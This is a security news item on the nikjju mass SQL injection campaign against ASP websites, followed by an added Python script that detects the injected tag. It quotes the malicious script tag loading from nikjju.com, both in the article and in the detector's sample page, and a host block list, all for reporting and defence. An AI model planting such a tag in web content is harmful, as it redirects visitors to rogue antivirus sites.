Hackers have compromised more than 180,000 webpages and injected a malicious script into them by exploiting SQL injection vulnerabilities. The nikjju mass SQL injection campaign targets ASP websites.
The compromised websites are injected with the following script:
<script src= http://nikjju.com/r.php ></script>
The injected script redirects visitors to fake/rogue AV sites (best-antiviruu.de.lv – mostly targeting Windows users).
According to the Sucuri report, Google shows 188,000 pages infected with that JavaScript call, but the number is growing really fast.
The domain Nikjju.com (31.210.100.242) was registered on April 1st, and the attack started a few days later (April 4th).
A few Chinese government websites have fallen to this attack:
- jnd.xmchengdu.gov.cn
- study.dyny.gov.cn
- www.cnll.gov.cn
- www.bj.hzjcy.gov.cn
- www.mirpurkhas.gov.pk
- www.tdnyw.gov.cn
- gcjs.kaifeng.gov.cn
If you suspect your site has been compromised, you can verify it with Sucuri SiteCheck (free scanner):
http://sitecheck.sucuri.net/scanner/
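For a local check, the script below is an added example (not from the original article or from Sucuri) that scans rendered page HTML or a text export of database content for script tags loading from the domain named above. It tolerates the unquoted, oddly spaced form of the injected tag; the function names and the sample page are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Host taken from the injected tag quoted in the article.
BAD_HOSTS = {"nikjju.com"}

# Tolerates any case, whitespace around "=" and quoted or unquoted values,
# because the injected tag reads: <script src= http://nikjju.com/r.php >
SCRIPT_SRC = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*[\"']?\s*([^\"'\s>]+)", re.IGNORECASE)

def script_host(src):
    """Return the lower-cased host of a script URL, or None for relative URLs."""
    try:
        return urlsplit(src).hostname
    except ValueError:
        return None

def is_flagged(host, bad_hosts=BAD_HOSTS):
    """True if host is a listed domain or a subdomain of one."""
    return host is not None and any(
        host == bad or host.endswith("." + bad) for bad in bad_hosts
    )

def find_injected_scripts(text, bad_hosts=BAD_HOSTS):
    """Return (line_number, src) for each script tag loading from a listed host."""
    hits = []
    for match in SCRIPT_SRC.finditer(text):
        src = match.group(1)
        if is_flagged(script_host(src), bad_hosts):
            line_no = text.count("\n", 0, match.start()) + 1
            hits.append((line_no, src))
    return hits

# Constructed sample: a page rendered from database fields after an injection.
SAMPLE = """<html><head><title>News<script src= http://nikjju.com/r.php ></script></title>
<script src="/js/site.js"></script>
</head><body>
<p>Welcome</p><SCRIPT SRC='HTTP://NIKJJU.COM/r.php'></SCRIPT>
<script src="https://notnikjju.com/lib.js"></script>
</body></html>"""

if __name__ == "__main__":
    for line_no, src in find_injected_scripts(SAMPLE):
        print(f"line {line_no}: {src}")
```

Because the tag is written into the database through SQL injection, a hit in rendered output means the stored records need cleaning and the injectable query needs fixing, not just the page.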